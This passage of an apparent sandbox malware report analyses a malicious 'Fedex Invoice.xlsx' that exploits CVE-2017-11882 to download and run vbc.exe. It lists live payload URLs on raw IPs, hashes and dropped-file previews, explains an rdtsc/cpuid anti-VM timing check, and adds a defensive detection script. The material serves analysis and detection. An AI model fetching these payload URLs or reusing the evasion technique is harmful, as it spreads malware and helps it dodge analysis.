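                0x8: "InterruptTime", 0x14: "SystemTime", 0x20: "TimeZoneBias"}

def fold_constants(listing):
    """Fold mov/add/xor/sub chains; record every rdtsc, cpuid leaf and dereferenced address."""
    regs, out = {}, {"rdtsc_count": 0, "cpuid_leaves": [], "derefs": []}

    def value(text):  # immediate 'XXXXh' -> int; register -> tracked value or None
        m = IMM_RE.match(text)
        return int(m.group(1), 16) & MASK if m else regs.get(text)
    for raw in listing.splitlines():
        m = INSN_RE.match(raw.strip())
        if not m:
            continue
        op, args = m.group(1).lower(), m.group(2) or ""
        if op == "rdtsc":
            out["rdtsc_count"] += 1
            regs["eax"] = regs["edx"] = None              # rdtsc writes EDX:EAX
        elif op == "cpuid":
            out["cpuid_leaves"].append(regs.get("eax"))    # leaf is taken from EAX
            regs.update(eax=None, ebx=None, ecx=None, edx=None)
        elif op in ("popad", "call"):
            regs.clear()                                  # nothing is known afterwards
        elif op in ("mov", "add", "xor", "sub"):
            dst, src = (a.strip() for a in args.split(",", 1))
            d = DEREF_RE.match(src)
            if d:                                         # mov reg, dword ptr [reg]
                out["derefs"].append(regs.get(d.group(1)))
                regs[dst] = None                          # loaded value is runtime data
                continue
            sval, dval = value(src), regs.get(dst)
            if op == "mov":
                regs[dst] = sval
            elif sval is None or dval is None:
                regs[dst] = None                          # taint: one unknown input
            else:
                regs[dst] = {"add": dval + sval, "xor": dval ^ sval,
                             "sub": dval - sval}[op] & MASK
    return out

def describe_address(addr):
    """Name an address inside KUSER_SHARED_DATA; hex otherwise; 'unknown' for None."""
    off = None if addr is None else addr - KUSER_SHARED_DATA
    if off is None or not 0 <= off < 0x1000:
        return "unknown" if addr is None else "0x%08X" % addr
    base = max(k for k in KUSER_FIELDS if k <= off)
    return "KUSER_SHARED_DATA+0x%X (%s+0x%X)" % (off, KUSER_FIELDS[base], off - base)
```

    What the decoded listing says: the two rdtsc reads bracket a cpuid with leaf 1, and cpuid forces a VM exit under every mainstream hypervisor, so the TSC delta is far larger inside a VM than on bare metal; the dec/cmp/jne on [ebp+F8h] repeats the measurement, and the SystemTime read gives an independent wall clock to compare the TSC against. A sandbox that intercepts rdtsc, as this report's interceptor entry shows, has to keep those two clocks consistent or the sample notices. The folding ignores test/cmp/jmp/ret/lfence and treats call and popad as clobbering everything, which is the conservative choice when the called bodies are not in the listing.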

    Mitre Att&ck Matrix

    The report's matrix was flattened in extraction; it is rendered here as one line per tactic, listing only the techniques the report marked as matched. The digits after each technique are the report's signature-count badges, reproduced as extracted.

    Initial Access: no match
    Execution: Exploitation for Client Execution (12)
    Persistence: no match
    Privilege Escalation: Process Injection (12); Extra Window Memory Injection (1)
    Defense Evasion: Masquerading (111); Virtualization/Sandbox Evasion (1); Process Injection (12); Obfuscated Files or Information (2); Software Packing (1); Extra Window Memory Injection (1)
    Credential Access: no match
    Discovery: Security Software Discovery (21); Virtualization/Sandbox Evasion (1); Process Discovery (1); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
    Lateral Movement: no match
    Collection: Archive Collected Data (1)
    Exfiltration: no match
    Command and Control: Encrypted Channel (1); Ingress Tool Transfer (12); Non-Application Layer Protocol (1); Application Layer Protocol (121)
    Network Effects, Remote Service Effects, Impact: no match

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    Fedex Invoice.xlsx | 31% | Virustotal | -
    Fedex Invoice.xlsx | 28% | ReversingLabs | Document-Word.Exploit.CVE-2017-11882

    Dropped Files

    Source | Detection | Scanner | Label
    C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | -
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML | -
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 24% | Virustotal | -

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    Source | Detection | Scanner | Label
    http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
    http://37.0.11.217/KELLYREMCOS_UOuJB118.bin | 1% | Virustotal | -
    http://37.0.11.217/KELLYREMCOS_UOuJB118.bin | 0% | Avira URL Cloud | safe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
    http://212.192.246.25/rever/vbc.exe | 8% | Virustotal | -
    http://212.192.246.25/rever/vbc.exe | 0% | Avira URL Cloud | safe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    Name | Malicious | Antivirus Detection | Reputation
    http://37.0.11.217/KELLYREMCOS_UOuJB118.bin | true | 1% Virustotal; Avira URL Cloud: safe | unknown
    http://212.192.246.25/rever/vbc.exe | true | 8% Virustotal; Avira URL Cloud: safe | unknown

    URLs from Memory and Binaries

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp | false | - | high
    http://www.icra.org/vocabulary/. | vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true | vbc.exe, 00000006.00000002.695178157.0000000003207000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
    http://www.day.com/dam/1.0 | 5DD04ABC.emf.0.dr | false | - | high

        Contacted IPs

        Public

        IP | Domain | Country | ASN | ASN Name | Malicious
        212.192.246.25 | unknown | Russian Federation | 205220 | RHC-HOSTINGGB | true

        General Information

        Joe Sandbox Version:33.0.0 White Diamond
        Analysis ID:483375
        Start date:14.09.2021
        Start time:21:50:17
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 6m 9s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:Fedex Invoice.xlsx
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:7
        Number of new started drivers analysed:2
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.expl.evad.winXLSX@4/21@0/1
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 4% (good quality ratio 2.3%)
        • Quality average: 36.2%
        • Quality standard deviation: 32.8%
        HCA Information:Failed
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .xlsx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        Warnings:
        • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.

        Simulations

        Behavior and APIs

        Time | Type | Description
        21:50:47 | API Interceptor | 29x Sleep call for process: EQNEDT32.EXE modified

        Joe Sandbox View / Context

        IPs

        Match | Associated Sample Name / URL | Detection | Context
        212.192.246.25 | ORDER.xlsx | malicious | 212.192.246.25/reverse/vbc.exe
        212.192.246.25 | Inquiry Sheet.xlsx | malicious | 212.192.246.25/excel/vbc.exe

        Domains

        No context

        ASN

        Match | Associated Sample Name / URL | Detection | Context
        RHC-HOSTINGGB | ORDER.xlsx | malicious | 212.192.246.25
        RHC-HOSTINGGB | Inquiry Sheet.xlsx | malicious | 212.192.246.25
        RHC-HOSTINGGB | 01_extracted.exe | malicious | 212.192.246.191
        RHC-HOSTINGGB | CHECKLIST INQ 1119.vbs | malicious | 212.192.246.191
        RHC-HOSTINGGB | DOCU_SIGN8289292930001028839.PDF.exe | malicious | 212.192.246.165
        RHC-HOSTINGGB | DOCU_SIGN8289292930001028838.PDF.exe (4 separate analyses) | malicious | 212.192.246.165
        RHC-HOSTINGGB | Ziraat Bankasi Swift Mesaji.exe (3 separate analyses) | malicious | 212.192.246.176
        RHC-HOSTINGGB | 53t6VeSUO5.exe | malicious | 212.192.246.56
        RHC-HOSTINGGB | 1p34FDbhjW.exe | malicious | 212.192.246.176
        RHC-HOSTINGGB | eli.exe (2 separate analyses) | malicious | 212.192.246.242
        RHC-HOSTINGGB | rfq-aug-09451.exe | malicious | 212.192.246.250
        RHC-HOSTINGGB | Nd1eFNdNeE.exe | malicious | 212.192.246.73
        RHC-HOSTINGGB | J5U0QK6IhH.exe | malicious | 212.192.246.147
        RHC-HOSTINGGB | RF 2001466081776.doc | malicious | 212.192.246.147

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
        Category:downloaded
        Size (bytes):135168
        Entropy (8bit):6.633797451082329
        Encrypted:false
        SSDEEP:1536:A8N0//nCe6zBm5+JqYnViL7yQMLIn6Otq/CrAvI70qBGqdFafRo6DomgJ:TaCeWBJdVc/MLo6Ot57HdFaf5oj
        MD5:ED004FE1AA9F4FA169A05B6716C03484
        SHA1:59AF725F7F1D9582674A0236F4E41B76BBA99D83
        SHA-256:ACE5D939D3258882A6D2E2431A690EE9ED410432BFA537465A2DD9DA92441F74
        SHA-512:B52579B5A47391863BD9CD5052375C3FEFE2A104D058929A3911D552E1BF0D4EC0C30C73469713F1B0852771FCB3C206F486C06AAC4C15E561C552FD333C193E
        Malicious:true
        Antivirus:
        • Antivirus: Joe Sandbox ML, Detection: 100%
        • Antivirus: Virustotal, Detection: 24%, Browse
        Reputation:low
        IE Cache URL:http://212.192.246.25/rever/vbc.exe
        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L.....VV............................p.............@..........................P..............................................$...(.......";..................................................................8... .......$............................text............................... ..`.data...dE..........................@....rsrc...";.......@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................
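        Added detection example, not from the report or from Joe Sandbox: the entry above and the process-creation line in the evasion section together establish two facts a detection engineer can key on. EQNEDT32.EXE writes a PE into the IE cache (Category: downloaded), and EQNEDT32.EXE then starts C:\Users\Public\vbc.exe. The script below encodes both rules over constructed events shaped like Sysmon Event ID 1 (process create) and Event ID 11 (file create) records; the paths are the report's, while the event shape and field names are an assumption of this example.

```python
import ntpath  # Windows path semantics regardless of the host the script runs on

# Constructed sample events shaped like Sysmon Event ID 1 (process create) and
# Event ID 11 (file create) records after field extraction. Paths are the ones
# in this report; the event shape and field names are an assumption.
EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
IE_CACHE_DROP = (r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
                 r"\Content.IE5\ZAE7RW1P\vbc[1].exe")
EVENTS = [
    # Excel starting Equation Editor for an embedded OLE object: expected on its own
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", "image": EQNEDT32},
    # Equation Editor writes a downloaded PE into the IE cache (Category: downloaded)
    {"id": 11, "image": EQNEDT32, "target": IE_CACHE_DROP},
    # Equation Editor launches the payload from a world-writable directory
    {"id": 1, "parent": EQNEDT32, "image": r"C:\Users\Public\vbc.exe"},
    # Unrelated benign activity to show the rules stay quiet
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe"},
]

PE_EXT = (".exe", ".dll", ".scr", ".com")
USER_WRITABLE = (r"c:\users\public", r"\appdata\local\temp", r"\temporary internet files")


def _base(path):
    return ntpath.basename(path).lower()


def _user_writable(path):
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def detect(events):
    """Return (rule, severity, artifact) for each event matching the Equation
    Editor abuse pattern: EQNEDT32.EXE spawning anything, or writing a PE."""
    alerts = []
    for ev in events:
        if ev["id"] == 1 and _base(ev["parent"]) == "eqnedt32.exe":
            # Equation Editor is an OLE server that renders formulas; it never
            # has a legitimate child process, so severity depends only on where
            # the child lives.
            sev = "critical" if _user_writable(ev["image"]) else "high"
            alerts.append(("EqnEdt32ChildProcess", sev, ev["image"]))
        elif ev["id"] == 11 and _base(ev["image"]) == "eqnedt32.exe" \
                and ev["target"].lower().endswith(PE_EXT):
            # The download/drop step of the CVE-2017-11882 / CVE-2018-0802 chains.
            alerts.append(("EqnEdt32DropsPE", "high", ev["target"]))
    return alerts
```

        The parent-based rule is the durable one: the URL path changes per campaign (/rever/ here, /reverse/ and /excel/ in the context section above) and the dropped name can change too, but EQNEDT32.EXE creating a child process does not happen legitimately. One caveat: Microsoft removed Equation Editor from Office in the January 2018 security updates, so on a patched estate EQNEDT32.EXE starting at all is worth an alert; the sandbox here ran Office 2010 SP1 (see General Information), which is why the chain still executed.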
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39BFBB29.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):49744
        Entropy (8bit):7.99056926749243
        Encrypted:true
        SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
        MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
        SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
        SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
        SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD04ABC.emf
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):648132
        Entropy (8bit):2.812211369731048
        Encrypted:false
        SSDEEP:3072:n34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:34UcLe0JOcXuunhqcS
        MD5:7BF1D75FF62365C6DAF8F6994B0808F9
        SHA1:C0154C020C48AC0B368D2EDC3FB1A3E78524015F
        SHA-256:F63F7244E9227031D9E5508D6EEF6D79FF1A563D3435B5C1854E27B74BD0A89F
        SHA-512:0BA39F8EB4CCA7131878F7477AAF6F99E77880109A7CFBB17D60809680B4BB2EFB0280DCB5F955AB6265E42958E2E74C53A653FD5E38992FACC3F34ADFC942B5
        Malicious:false
        Reputation:low
        Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$...p.5..f.Y.@8.%...L.5...5.......5.t.5.RQ$[..5...5.....\.5...5.$Q$[..5...5. ...Id.Y..5...5. ............d.Y............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i.............5.X.....5. .5..8.Y........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6576CE85.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):84203
        Entropy (8bit):7.979766688932294
        Encrypted:false
        SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
        MD5:208FD40D2F72D9AED77A86A44782E9E2
        SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
        SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
        SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6964C2A.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
        Category:dropped
        Size (bytes):85020
        Entropy (8bit):7.2472785111025875
        Encrypted:false
        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
        MD5:738BDB90A9D8929A5FB2D06775F3336F
        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96EA4B94.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
        Category:dropped
        Size (bytes):7006
        Entropy (8bit):7.000232770071406
        Encrypted:false
        SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
        MD5:971312D4A6C9BE9B496160215FE59C19
        SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
        SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
        SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
        Malicious:false
        Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98762820.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
        Category:dropped
        Size (bytes):14198
        Entropy (8bit):7.916688725116637
        Encrypted:false
        SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
        MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
        SHA1:72CA86D260330FC32246D28349C07933E427065D
        SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
        SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
        Malicious:false
        Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A4FD716.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):6815
        Entropy (8bit):7.871668067811304
        Encrypted:false
        SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
        MD5:E2267BEF7933F02C009EAEFC464EB83D
        SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
        SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
        SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
        Malicious:false
        Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6E6B01F.png
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):33795
        Entropy (8bit):7.909466841535462
        Encrypted:false
        SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
        MD5:613C306C3CC7C3367595D71BEECD5DE4
        SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
        SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
        SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
        Malicious:false
        Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8149A23.jpeg
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
        Category:dropped
        Size (bytes):8815
        Entropy (8bit):7.944898651451431
        Encrypted:false
        SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
        MD5:F06432656347B7042C803FE58F4043E1
        SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
        SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
